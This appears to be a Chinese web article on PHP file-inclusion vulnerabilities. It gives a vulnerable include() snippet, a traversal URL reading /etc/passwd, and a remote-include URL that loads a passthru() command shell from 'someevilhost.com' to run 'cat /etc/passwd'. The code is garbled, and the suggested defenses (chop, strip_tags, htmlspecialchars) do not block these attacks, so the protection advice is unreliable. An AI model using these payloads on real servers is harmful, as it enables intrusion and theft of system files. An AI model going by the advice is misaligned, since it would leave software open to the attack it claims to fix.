您好,登錄后才能下訂單哦!
這篇文章主要介紹文件包含漏洞防護以及常見文件讀取payload的示例分析,文中介紹的非常詳細,具有一定的參考價值,感興趣的小伙伴們一定要看完!
僅供參考學習使用
現在請看下面的代碼
<a href=index.php?page=file1.php> Files </a>
<? Php
$page = $ _GET [page];
include ($ page);
?>
這里顯然不應該使用它。$page變量并未完全清除。 $page輸入直接定向到網頁,這是一個很大錯誤。這里刪除通過瀏覽器傳遞的所有輸入。當用戶在訪問網頁時單擊“文件”訪問到“ files.php”時,將出現下面的內容。
http://localhost/index.php?page=files.php
現在,如果沒有一個清理輸入中變量$page,我們可以利用它執行我們的命令。如果主機在Unix/Linux服務器,我們可以讀取用戶密碼,如下面的url所示。
http://localhost/index.php?page=.. /../../../../../etc/passwd
上面的url會返回/etc/passwd
<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = $ _GET [page];
include ($ page);
?>
現在假設我們輸入的url如下
http://localhost/index.php?page=http://google.com/
可能是$ page變量最初放置在頁面上的位置,我們得到了google.com主頁。我們都知道c99(shell)可以做什么,并且如果編碼人員注意的話,它們可能會包含在頁面中,從而允許用戶在瀏覽敏感文件。讓我們看一下網頁上可能發生的一些更簡單的事情。現在,我們創建一個名為“ test.php”的文件,并將以下代碼放入其中,然后保存。
<? Php
passthru ($ _ GET [cmd]);
?>
我們可以利用此文件來利用它, PHP中的passthru()函數是非常危險的。使用test.php中的這段代碼,我們可以向網頁發送請求,包括文件包含漏洞。如以下url所示
http://localhost/index.php?page=http: //someevilhost.com/test.php
當代碼使用$_GET請求,我們必須提供一個參數傳遞給passthru(). 我們可以在url中這樣輸入。
http://localhost/index.php?page=http://someevilhost.com/test.php?cmd=cat /etc/passwd
這unix機器也將提取的文件/etc/passwd使用的cat的命令。現在我們需要知道如何控制它,使任何人都不可能執行命令,和如何包括遠程執行你的服務器命令。 我們可以禁止passthru()函數。正如前文所述我們可以清除輸入。我們這里可以在函數中使用一些PHP建議的結構。最初,perl的chop()函數適應了PHP,該PHP從數組中刪除了空格。我們可以這樣使用它。
<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = chop ($ _ GET [page]);
include ($ page);
?>
php中有許多函數可以清除字符串,如htmlspecialchars()htmlentities(),stripslashes()等。我們可以在PHP中執行一個可以為所有內容的函數。如下面代碼所示
<? Php
function cleanAll ($ input) {
$ input = strip_tags ($ input);
$ input = htmlspecialchars ($ input);
return ($ input);
}
?>
這里還可以使用str_replace()函數,并且還有很多其他函數可以清除它們。
以上是“文件包含漏洞防護以及常見文件讀取payload的示例分析”這篇文章的所有內容,感謝各位的閱讀!希望分享的內容對大家有幫助,更多相關知識,歡迎關注億速云行業資訊頻道!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。